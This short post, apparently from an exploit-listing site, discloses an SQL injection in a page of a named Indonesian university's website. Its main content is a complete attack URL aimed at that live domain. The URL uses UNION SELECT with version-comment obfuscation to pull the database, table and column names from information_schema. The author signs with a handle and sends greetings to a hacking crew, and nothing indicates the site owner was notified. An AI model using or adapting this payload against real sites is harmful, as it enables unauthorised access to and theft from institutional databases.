UIN Alauddin Makassar SQL Injection Vulner

2019.12.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Nick name : KHS1N Cyber 07
#Youtube : HCT Sec07
#contact : kuliahdopermanent@gmail.com

Vulnerability : #SQL Injection
domain site && payload :
http://uin-alauddin.ac.id/agenda--227-rektor-menghadiri-pelantiknan-rektor-periode-20192023'+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/,3,4,5,6,7,8,9,10--+--.html

HCI Indonesia, bartes dwky, lammer permanent, and for all members


Copyright 2024, cxsecurity.com